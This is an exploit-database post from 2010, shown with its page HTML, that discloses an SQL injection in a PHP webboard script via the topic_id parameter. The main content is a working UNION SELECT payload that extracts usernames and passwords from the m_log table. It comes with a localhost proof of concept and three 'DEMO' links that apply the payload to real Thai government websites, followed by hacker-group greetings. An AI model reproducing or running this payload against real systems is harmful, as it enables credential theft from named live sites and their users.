[webapps / 0day] - Webboard (topic_id=) SQL Injection Vulner
Posted on 07 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Webboard (topic_id=) SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Webboard (topic_id=) SQL Injection Vulnerability by c4uR in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================ Webboard (topic_id=) SQL Injection Vulnerability ================================================ ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. cucunya kongSANUN ;)) .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / ` / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : c4uR DATE : 07 october 2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Error in file webboard_view.php PHP code: $result : error = select * from tbl_web_q where q_id = A vulnerable parameter $ topic_id= +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############################################################################### 3spl0iT : [+] -7/**/union/**/select/**/all/**/1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8/**/from/**/m_log/**/c4uR sQl1 p0c : [+] http://127.0.0.1/webboard/webboard_view.php?topic_id=-7/**/union/**/select/**/all/**/1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8/**/from/**/m_log/**/c4uR ############################################################################### DEMO: http://www.thungkhok.go.th/webboard/webboard_view.php?topic_id=-7 /**/ union /**/ select /**/ all /**/ 1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8 /**/ from /**/ m_log /**/ c4uR http://www.donyanang.go.th/webboard/webboard_view.php?topic_id=-7 /**/ union /**/ select /**/ all /**/ 1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8 /**/ from /**/ m_log /**/ c4uR http://www.srapanglan.go.th/webboard/webboard_view.php?topic_id=-7 /**/ union /**/ select /**/ all /**/ 1,2,group_concat(username,0x3a,password,0x3a,chk_status,0x3c62723e),4,5,6,7,8 /**/ from /**/ m_log /**/ c4uR ------------------------------------------------------------------------------- [+] Apartment Griya Semanggi | poinsonV [+] [+] devilzc0de | hashkiller | indonesian-cyber | YOGYAcarderlink [+] [+] kacau bener musim hujan 2010 >.< [+] ------------------------------------------------------------------------------- # qinoryy@yahoo.com # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-07]</pre></body></html>
